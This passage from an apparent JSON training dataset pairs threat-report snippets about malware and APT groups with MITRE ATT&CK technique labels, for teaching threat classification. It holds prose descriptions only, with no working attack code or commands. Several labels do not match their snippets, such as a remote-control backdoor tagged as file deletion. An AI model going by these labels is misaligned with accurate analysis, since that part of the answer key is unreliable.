}, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data", + "output": "- T1560.002: Archive Collected Data - Archive via Library\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code", + "output": "- T1027: Obfuscated Files or Information\n- T1218.010: System Binary Proxy Execution - Regsvr32\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain", + "output": "- T1482: Domain Trust Discovery\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key/value:\u00a0HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It also creates a folder in C:\\SDRSMLINK\\ and shares this folder with the rest of the network", + "output": "- T1564.006: Hide Artifacts - Run Virtual Instance\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP/HTTPS/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Most of the infected sites use the TYPO3 CMS (see: https://typo3.org/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known \u2018PlugX\u2019 or \u2018HttpBrowser\u2019 RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user\u2019s AppData\\Local\\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time", + "output": "- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "mailsearcher32 module This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users", + "output": "- T1087.003: Account Discovery - Email Account\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The persistence mechanisms also change, offering the options to use XDG Autostart Entries and crontabs for persistence. We\u2019ve waxed lyrical about crontabs before, but we haven\u2019t explored XDG Autostart Entries in detail", + "output": "- T1547.013: Boot or Logon Autostart Execution - XDG Autostart Entries" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird", + "output": "- T1087.003: Account Discovery - Email Account\n- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2", + "output": "- T1036: Masquerading\n- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RAR archiving \u2013 files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors", + "output": "- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims\u2019 machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Then, the malware loads an executable file from WM_DSP resource and runs a shellcode that contains approximately1500 bytes (after decrypting it with XOR 0x45", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky\u2019s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead", + "output": "- T1556.004: Modify Authentication Process - Network Device Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole is capable of scanning enabled wireless networks on the compromised system. It records information such as the SSID and MAC address of the visible Wi-Fi access points", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server", + "output": "- T1560.002: Archive Collected Data - Archive via Library" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actors also collected the files \u201cntds.dit\u201d and the \u201cSYSTEM\u201d registry hive. DHS observed the threat actors compress all of these files into archives named \u201cSYSTEM.zip\u201d and \u201ccomps.zip", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok", + "output": "- T1203: Exploitation for Client Execution\n- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Quickly after the initial compromise, the operator deploys a tool named \"\"dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json\"", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets\u2019 behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool", + "output": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns", + "output": "- T1106: Native API\n- T1218.011: System Binary Proxy Execution - Rundll32\n- T1120: Peripheral Device Discovery\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Proofpoint researchers frequently observe Silent Librarian\u2019s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university\u2019s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server", + "output": "- T1608.005: Stage Capabilities - Link Target\n- T1598.003: Phishing for Information - Spearphishing Link\n- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An official website of the United States government . Here\u2019s how you know . Official websites use .gov A .gov website belongs to an official government organization in the United States. Secure .gov websites use HTTPS A lock (LockA locked padlock) or https:// means you\u2019ve safely connected to the .gov website. O\u2019Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China\u2019s intelligence service access to sensitive business information,\u201d said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer\u2019s operating system. Such malware enabled members of the APT10 Group to monitor victims\u2019 computers remotely and steal user credentials", + "output": "- T1199: Trusted Relationship" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign 